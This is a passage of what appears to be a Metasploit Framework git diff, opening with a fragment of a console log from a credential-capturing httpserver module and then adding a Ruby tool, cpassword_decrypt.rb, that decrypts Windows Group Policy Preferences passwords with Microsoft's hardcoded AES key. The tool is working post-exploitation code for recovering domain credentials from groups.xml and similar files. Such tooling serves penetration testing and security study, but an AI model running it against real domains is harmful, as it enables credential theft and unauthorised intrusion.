msf auxiliary(httpserver) > run [-] 10.0.1.76 httpserver - Bad login [*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html [+] Authenticated - - + =end diff --git a/tools/cpassword_decrypt.rb b/tools/cpassword_decrypt.rb new file mode 100755 index 0000000000..24439fc50e --- /dev/null +++ b/tools/cpassword_decrypt.rb @@ -0,0 +1,132 @@ +#!/usr/bin/env ruby + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# +# This script will allow you to specify an encrypted cpassword string using the Microsofts public +# AES key. This is useful if you don't or can't use the GPP post exploitation module. Just paste +# the cpassword encrypted string found in groups.xml or scheduledtasks.xml and it will output the +# decrypted string for you. +# +# Tested Windows Server 2008 R2 Domain Controller. +# +# Authors: +# Ben Campbell +# Loic Jaquemet +# scriptmonkey +# theLightCosine +# mubix (domain/dc enumeration code) +# David Kennedy "ReL1K" +# +# References: +# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +# http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13) +# http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html +# http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx +# +# Demo: +# $ ./cpassword_decrypt.rb AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk +# [+] The decrypted AES password is: testpassword +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib'))) +require 'fastlib' +require 'msfenv' +require 'rex' + + +class CPassword + + # + # Decrypts the AES-encrypted cpassword string + # @param encrypted_data [String] The encrypted cpassword + # @return [String] The decrypted string in ASCII + # + def decrypt(encrypted_data) + # Prepare the password for the decoder + padding = "=" * (4 - (encrypted_data.length % 4)) + epassword = "#{encrypted_data}#{padding}" + + # Decode the string using Base64 + decoded = Rex::Text.decode_base64(epassword) + + # Decryption + key = '' + key << "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc" + key << "\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" + begin + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") + aes.decrypt + aes.key = key + plaintext = aes.update(decoded) + plaintext << aes.final + rescue OpenSSL::Cipher::CipherError + # Decryption failed possibily due to bad input + return '' + end + + # Converts the string to ASCII + Rex::Text.to_ascii(plaintext) + end +end + + +# +# Shows script usage +# +def usage + print_status("Usage: #{__FILE__} [The encrypted cpassword string]") + exit +end + + +# +# Prints a status message +# +def print_status(msg='') + $stderr.puts "[*] #{msg}" +end + + +# +# Prints an error message +# +def print_error(msg='') + $stderr.puts "[-] #{msg}" +end + + +# +# Prints a good message +# +def print_good(msg='') + $stderr.puts "[+] #{msg}" +end + + +# +# main +# +if __FILE__ == $PROGRAM_NAME + pass = ARGV.shift + + # Input check + usage if pass.nil? or pass.empty? + + cpasswd = CPassword.new + pass = cpasswd.decrypt(pass) + + if pass.empty? + print_error("Nothing was decrypted, please check your input.") + else + print_good("The decrypted AES password is: #{pass}") + end +end \ No newline at end of file